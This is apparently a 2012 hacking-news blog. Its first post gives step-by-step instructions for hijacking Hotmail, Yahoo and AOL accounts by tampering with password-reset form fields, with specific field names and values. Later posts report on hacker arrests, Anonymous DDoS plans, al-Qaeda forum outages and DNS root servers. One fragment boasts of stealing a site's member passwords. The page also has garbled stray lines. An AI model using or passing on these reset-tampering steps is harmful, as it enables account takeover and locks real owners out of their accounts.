Sunday, April 29, 2012

Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities


Yesterday we Reported a 0-Day Vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the account's real owners. Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data.When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose.

Microsoft spokesperson confirmed the existence of the security flaw and the fix, but offered no further details: “On Friday, we addressed an incident with password reset functionality; there is no action for customers, as they are protected.

Later Today another unknown hacker reported another similar vulnerabilities in Hotmail, Yahoo and AOL. Using same Tamper Data add-on attacker is able to Reset passwords of any account remotely. This is somewhat a critical Vulnerability ever exposed, Millions of users can effected in result.

Here Below Hacker Demonstrated Vulnerabilities:
1.) Hotmail :

Step 1. Go to this page .
Step 2. Enter the Target Email and enter the 6 characters you see.
Step 3. Start Tamper Data
Step 4. Delete Element "SendEmail_ContinueCmd"
Step 5. change Element "__V_previousForm" to "ResetOptionForm"
Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI"
Step 7. Click O.K and Type THe new Password 
Step 8. sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time

2.) Yahoo

Step 1. Go to this page .
Step 2. EnTer the Target Email . and Enter the 6 characters you see .
Step 3. Start Tamper Data Delete
Step 4. change Element "Stage" to "fe200"
Step 5. Click O.K and Type The new Password 
Step 6. Start Tamper Data All in Element Z
Step 7.done
3.) AOL:

Step 1. Go to Reset Page
Step 2. EnTer the Target Email . and Enter the characters you see .
Step 3. Start Tamper Data 
Step 4. change Element "action" to "pwdReset"
Step 5. change Element "isSiteStateEncoded" to "false"
Step 6. Click O.K and Type THe new Password 
Step 7. Start TamperDaTa All in Element rndNO
Step 8. done

Saturday, April 7, 2012

Al-Qaeda websites under attack

Al-Qaeda websites hacked and remains down for past 12 days

Al-Qaeda's main internet forums have been offline for the past 12 days in the longest sustained outages of the sites since they began operating. Several online forums frequently visited by al-Qaeda operatives were downed over the course of the last few weeks, including two of the terrorist organization’s top sites, al-Fida and Shamukh al-Islam.

No one has claimed responsibility for disabling the sites but the breadth and duration of the outages have prompted speculation the forums have been taken down in a cyber attack launched perhaps by a government or hacking group.

The digital sabotage could have been carried out by any number of governments or private hackers, said James Lewis, director of the technology and public policy program at the Center for Strategic and International Studies.

Some analysts have speculated that the administrators of the sites might have taken them down if they suspected that the forums had been infiltrated by foreign spies.

Repeated attacks probably will force the jihadists to improve their security, making it more difficult for any intelligence agency trying to hack any network.

The Shumkah site went live again Wednesday with a message that the cyberattack was “a failed, miserable campaign,” according to a translation of the message by security consultant Flashpoint Partners.“

Friday, April 6, 2012

Your girlfriend is so stupid

British Paypal hacker jailed for stealing millions Identities

A UK cybercrook has been jailed for 26 months following his conviction for stealing millions of banking and PayPal identities. According to Report, Southwark Crown Court heard how Edward Pearson, 23, could have made about £834,000 if he chose to use the information he hacked out of people's Paypal accounts.

Pearson, an 'incredibly talented' boarding school student who carried out the crime for an ‘intellectual challenge’, has been jailed for two years and two months.

"One of his programs scanned through 200,000 accounts registered to online payment service PayPal - identifying names, passwords and current balances." according to the Daily Mail.

Pearson might have been able to cash out the compromised accounts and make hundreds of thousands in ill-gotten gains. But in the event he actually only made £2,400 before his 21-year-old student girlfriend, Cassandra Mennim, used stolen credit cards to book rooms at two upmarket York hotels, transactions that put police of the trail of the pair. Investigators then linked Pearson's email address to an online identity, G-Zero, which he was purported to have used on underground hacking forums.

The original charges show that Pearson and his girlfriend were also dealing the drug MDVP, but these were dropped. Pearson admitted to making an article for use in fraud and two counts of possession of an article for use in fraud. Mennim admitted to two counts of obtaining services dishonestly.

Pearson also is also allged to have hacked into Nokia’s network back in August 2011, prompting the telecoms giant to shut down its internal network for two weeks.

Anonymous again

Anonymous Plans 7 April Attack on British government
Anonymous+Plans+7+April+Attack+on+British+governmentUK hackers linked to the Anonymous group are encouraging supporters to attack the Home Office website this Saturday (7 April) in protest at the extradition of three UK citizens to the US. Called#OpTrialAtHome, the hacktivist group @AnonOpUK posted a warning on its Twitter page that an attack on the Home Office was planned for Saturday, 7 April.
An associated photo/poster shows images of Gary McKinnon, Richard O’Dwyer and Christopher Tappin. McKinnon and O’Dwyer are awaiting extradition from the UK to the US. Tappin’s extradition was effected on 24 February when he was flown to El Paso, Texas.
Supporters have been encouraged to launch denial-of-service attacks on the Home Office's IP address, which Anonymous has revealed. Those not savvy enough to launch automated attacks on the site could contribute to the effect by simply visiting the site in large numbers.

Julian Assange, the editor-in-chief and founder of WikiLeaks, was arrested in the UK under an EAW issued by Sweden, and is currently fighting extradition to Sweden.McKinnon, a Scottish systems administrator, was arrested in 2002 for allegedly hacking into US military and Nasa computers in 2001 and 2002 and deleting files and copying data.

Tappin, a retired British businessman, is accused by the US government of illegally exporting materials to Iran for building surface-to-air missiles.

O'Dwyer, the owner of, is charged with hosting copyrighted materials on his site and the US Justice Department has been seeking his extradition since May 2011.

Anonymous’ #OpTrialAtHome is timed to commence at 9:00pm on Saturday, April 7, with a DDoS attack on the Home Office website.

Thursday, April 5, 2012

yesterday i hacked site and i get username and password members of the site 

and this password

Young Hacker Down

17-year-old Hacker arrested for hacking into KPN mobile telecommunications

year-old boy has been arrested for hacking into mobile telecommunications company KPN in the Netherlands. He has also been accused of other breaches in Japan, Korea, and Norway. The teenager was arrested last Tuesday in the Dutch town of Barendrecht, where police seized an encrypted computer, two laptops and other storage media including external hard drives, DVDs and USB sticks.The arrested teenager called himself "xS", "Yoshioka" and "Yui" online, is also suspected of breaching security of Tokohu University in Japan, as well as hacking computers at the Korea Advanced Institute of Science and Technology (KAIST) and at Trondheim University in Norway. Last but not least, he reportedly ran a website used for selling stolen credit card data.
KPN also noted the arrest is unrelated to a January hack which resulted in the company taking 2 million e-mail accounts offline as a precaution.

DNS root servers

Why Hackers Can't take down DNS root servers ?

Interpol Chief Ronald Noble on Friday warned that a group of hackers might try to shut down internet service tomorrow. The hacking group, Anonymous, is protesting against several reasons including the crash of Wall Street and irresponsible leaders.

There are 13 DNS servers that host the core databases for translating IP addresses. Anonymous hackers have announced "Operation Global Blackout", promising to cause an Internet-wide blackout by disabling the core DNS servers.

Anonymous  Hackers wants to bombard those 13 servers with traffic using a distributed denial of service attack. If the servers get too overloaded, they’ll crash and therefore be unable to fulfil DNS lookups rendering all domain names useless.
But there are lots of Limitations in this type of attack :
  • There are 13 Root Servers out there, It it not possible to shut down every of them. Even every root server is under control of various companies and they have different hardware and different ways to protect it. If any root server will get down, They can migrate it to other servers.
  • Anonymous Issue the Date i.e 31 march 2012 for there attack, obviously there will be 100's of Security Experts aware about the attack and working at backend for Security and resolving the issues.
  • Internet users don't use Root servers service directly, they are the master servers. Whereas internet users are connected to slave servers , provided by their internet service provider (ISP). Slave servers synchronice there data with root servers (master servers).
  • Root servers are implemented as clusters of hosts using anycast addressing. Anycasting is a tweek to the Internet routing table so that traffic destined for an IP address is redirected to a different local server  Meanwhile, Interpol has launched Operation Unmask to deal with the group and arrested 31 alleged members in two different phases in February and March, 2012. There are around 2.3 billion internet users in the world and more than one million of them are affected by cybercrime every year while $388 billion dollars is the global cost of such crimes.



Sunday, April 1, 2012

Chinese hacker

Chinese hacker targeting Indian government and Tibetan activists Sites

Websites of Indian government and Tibetan activists in the country are under attack in a cyber attack campaign engineered by a Chinese hacker, working with one of the world's largest e-tailers Tencent.

The cyber criminal in question is Gu Kaiyuan, once a graduate student at a Chinese university that receives government financial support for its computer security program and currently an employee at Chinese portal Tencent. Before Kaiyuan initiated the exploits, collectively called the Luckycat campaign, he was involved in recruiting students for his school’s computer security and defense research. The Luckycat cyber campaign, has been linked to 90 attacks in recent past against targets in India and Japan, as well as against Tibetan activists, said the report released by the Japanese network security firm. 'Luckycat' has been able to compromise about 233 computers many of which are in India. A report on the campaign from cloud security company Trend Micro shows that the Luckycat perpetrators began around June 2011.